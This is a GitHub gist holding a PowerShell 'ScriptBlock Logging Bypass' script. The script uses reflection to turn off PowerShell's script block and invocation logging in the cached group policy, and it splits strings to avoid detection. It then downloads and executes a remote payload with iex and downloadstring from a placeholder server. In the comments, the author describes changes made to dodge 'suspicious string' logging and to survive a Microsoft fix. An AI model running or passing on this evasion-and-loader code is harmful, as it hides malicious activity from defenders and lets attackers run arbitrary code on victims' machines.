Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://myserver/mypayload.ps1")
@cobbr
Copy link
Author

cobbr commented Jul 9, 2017

Turns out I missed a couple of those "suspicious strings" the first time around. This now gets logged at "Verbose" level instead of "Warning".

@cobbr
Copy link
Author

cobbr commented Nov 15, 2017

A little while back, this bypass was 'fixed' (something changed) on the latest version of PS 5.1. Updated it so it will work on all versions of PowerShell.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment